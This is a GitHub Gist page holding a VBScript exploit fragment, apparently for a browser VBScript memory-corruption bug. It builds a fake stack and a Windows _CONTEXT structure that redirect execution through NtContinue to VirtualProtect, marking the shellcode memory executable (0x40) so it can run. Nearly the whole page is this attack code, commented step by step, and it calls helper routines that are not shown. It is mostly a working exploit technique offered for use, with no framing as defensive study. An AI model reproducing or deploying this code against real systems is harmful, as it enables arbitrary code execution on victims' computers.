-
-
Save piotrflorczyk/ca37f2f56a93ac1745a7f25e1854ac11 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function VirtualProtectCallParameters(shellcodePtr) | |
Dim result | |
result = String(10000,Unescape("%u4141")) ' 'A' * 0x10fdc - padding, this space will be used as stack | |
result = result & UnescapeValue(shellcodePtr) ' &shellcode - address to return to after VirtualProtect | |
result = result & UnescapeValue(shellcodePtr) ' &shellcode - lpAddress (1st param for VirtualProtect) | |
result = result & UnescapeValue(12288) ' 0x3000 - size (2nd param for VirtualProtect) | |
result = result & UnescapeValue(64) ' 0x40 - newProtect (3rd param for VirtualProtect) | |
result = result & UnescapeValue(shellcodePtr-8) ' &(shellcode-8) - lpOldProtect (4th param for VirtualProtect) | |
result = result & String(6,Unescape("%u4242")) ' 'B' * 12 - padding and allignment | |
result = result & StructWithNtContinueAddr() ' \x00 * 3 NtContinue * 4 \x00 | |
result = result & String((524288-LenB(result))/2,Unescape("%u4141"))' 'A' * (0x80000 - current_size) - padding | |
VirtualProtectCallParameters = result | |
End Function | |
Function StructForNtContinue(structForVirtualProtect) | |
Dim result | |
Dim ntContinuePtr | |
ntContinuePtr = structForVirtualProtect + 35 | |
result = "" | |
result = result & UnescapeValue(ntContinuePtr) | |
result = result & String((184-LenB(result))/2,Unescape("%u4141")) ' 'A' * 0xb8 - initalize _CONTEXT with 'A' | |
result = result & UnescapeValue(VirtualProtect) ' VirtualProtect - _EIP in _CONTEXT struct | |
result = result & UnescapeValue(27) ' 0x1b - CsSeg in _CONTEXT struct | |
result = result & UnescapeValue(0) ' 0x00 - EFLAGS in _CONTEXT struct | |
result = result & UnescapeValue(structForVirtualProtect) ' structForVirtualProtect - _ESP in _CONTEXT struct | |
result = result & UnescapeValue(35) ' 0x23 - SsSeg in _CONTEXT struct | |
result = result & String((1024-LenB(result))/2,Unescape("%u4343")) ' 'A' * (0x400 - current_size) - padding | |
StructForNtContinue = result | |
End Function | |
SetVarData GetShellcode() | |
shellcodePtr = ReadRawPointer() + 8 | |
SetVarData VirtualProtectCallParameters(shellcodePtr) | |
structForVirtualProtect = ReadRawPointer() + 20000 | |
SetVarData StructForNtContinue(structForVirtualProtect) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment